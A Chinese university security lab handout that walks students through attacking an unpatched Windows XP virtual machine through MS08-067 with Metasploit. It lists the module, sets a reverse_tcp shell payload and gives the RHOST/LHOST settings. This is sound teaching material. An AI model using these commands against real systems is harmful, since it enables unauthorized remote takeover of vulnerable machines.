计算机系统安全实验二-metasploit

计算机系统安全实验二-metasploit
计算机系统安全实验二-metasploit

计算机系统安全实验二-

m e t a s p l o i t

-标准化文件发布号:(9456-EUATWK-MWUB-WUNN-INNUL-DDQTY-KII

计算机系统安全实验二:

操作系统安全与metasploit渗透测试

实验目的:

学习计算机操作系统安全相关内容。

学习操作系统渗透相关内容

学习metasploit渗透工具使用。

实验原理:

Windows 操作系统安全结构

网络渗透原理

实验环境:

软件: vmware 环境下,

虚拟机, vm-WinXP镜像

虚拟机,backtrack 4及backtrack 5 虚拟机镜像等。

实验拓扑:

被渗透机:使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中network_vm 目录中有metasploitable_XP,可使用之。

渗透测试机:使用Bt4或5作为操作系统,

准备工作:

启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:被渗透机:

操作系统:____windows xp with sp1_________

IP地址:____________________

渗透测试机:

操作系统:___________bt5_______

IP地址:___________________

(注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)

实验内容:

第一部分:针对操作系统内部服务端口进行渗透

了解ms08-067漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。

漏洞对象:

受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。

漏洞端口:

_______445_________________________________________________步骤一:

启动metasploit 控制台msfconsole

记录其

步骤二:

搜索模块 ms08-067号模块

search ms08-067

找到模块,记录其名称,级别,描述步骤三:

使用这个模块

use windows/smb/ms08_067_netapi

步骤四:

查找有用的payloads

show payloads

步骤五:

使用其中最常用的一个payload

set payload windows/shell/reverse_tcp

步骤六:

查看当前的这个payload 以及攻击所需要的参数选项

show options

发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE 有些没有RHOST

发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST

渗透的目标设置值 : 0

步骤七:

设置参数

set RHOST 被渗透主机的IP地址

set LHOST 渗透测试主机的IP地址。

步骤八:

show options 查看当前参数设置是否齐全。

步骤九:

show targets 查看当前攻击的目标。

相关主题
相关文档
最新文档